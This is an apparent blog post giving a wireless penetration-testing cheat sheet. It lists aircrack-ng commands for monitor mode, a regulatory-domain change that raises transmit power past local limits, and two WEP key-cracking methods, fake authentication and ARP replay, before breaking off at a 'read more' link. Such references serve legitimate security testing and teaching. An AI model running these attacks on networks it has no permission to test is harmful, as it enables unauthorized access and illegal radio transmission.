wireless cheat sheet

Wireless Penetration Testing Cheat Sheet

Posted on Updated on


WIRELESS ANTENNA


Kill Monitor Processes

root@uceka:~# airmon-ng check kill

Open the Monitor Mode

root@uceka:~# ifconfig wlan0 down
root@uceka:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this ;
# iwconfig wlan0 mode monitor
# use wlan0 instead of wlan0mon
root@uceka:~# ifconfig wlan0 up

Increase Wi-Fi TX Power

root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig

Change WiFi Channel

root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>

WEP CRACKING


 Method 1 : Fake Authentication Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack

root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Read the rest of this entry »